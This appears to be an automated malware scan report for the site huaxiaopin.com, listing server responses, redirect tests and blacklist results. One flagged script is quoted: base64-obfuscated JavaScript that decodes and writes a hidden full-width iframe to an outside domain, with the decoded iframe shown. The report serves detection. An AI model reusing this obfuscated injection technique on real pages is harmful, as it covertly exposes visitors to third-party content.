Scanned pages/files
Request | Server response | Status |
http://huaxiaopin.com/ | HTTP/1.1 200 OK Date: Mon, 10 Nov 2014 18:41:42 GMT Accept-Ranges: bytes ETag: "4a6dea20b9f8cf1:d99d7" Server: Microsoft-IIS/6.0 Content-Length: 356 Content-Location: http://huaxiaopin.com/index.html Content-Type: text/html Last-Modified: Wed, 05 Nov 2014 05:27:02 GMT X-Powered-By: ASP.NET | clean |
http://huaxiaopin.com/index.html | 403 Forbidden Content-Length: 1455 Content-Type: text/html | clean |
http://huaxiaopin.com/test404page.js | 404 Not Found Content-Length: 15262 Content-Type: text/html | clean |
http://636565.com/1.js | 200 OK Content-Length: 1242 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. var url='PGlmcmFtZSBzcmM9Imh0dHA6Ly93d3cuODg4NTU1MC5jb20vIiBmcmFtZWJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJubyIgd2lkdGg9IjEwMCUiIGhlaWdodD0iNDI0OSI+PC9pZnJhbWU+';
var data=decode64(url); document.write(data); function decode64(input) { var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; var output = ""; var chr1, chr2, chr3 = ""; var enc1, enc2, enc3, enc4 = ""; var i = 0; ...[927 bytes skipped]...
Decoded script: <iframe src="http://www.8885550.com/" frameborder="0" scrolling="no" width="100%" height="4249"></iframe>
http://js.users.51.la/16884167.js | 200 OK Content-Length: 1979 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: huaxiaopin.com
Result:
HTTP/1.1 200 OK
Date: Mon, 10 Nov 2014 18:41:42 GMT
Accept-Ranges: bytes
ETag: "4a6dea20b9f8cf1:d99d7"
Server: Microsoft-IIS/6.0
Content-Length: 356
Content-Location: http://huaxiaopin.com/index.html
Content-Type: text/html
Last-Modified: Wed, 05 Nov 2014 05:27:02 GMT
X-Powered-By: ASP.NET
...356 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: huaxiaopin.com
Referer: http://www.google.com/search?q=huaxiaopin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=huaxiaopin.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://huaxiaopin.com/
Result: huaxiaopin.com is not infected or malware details are not published yet.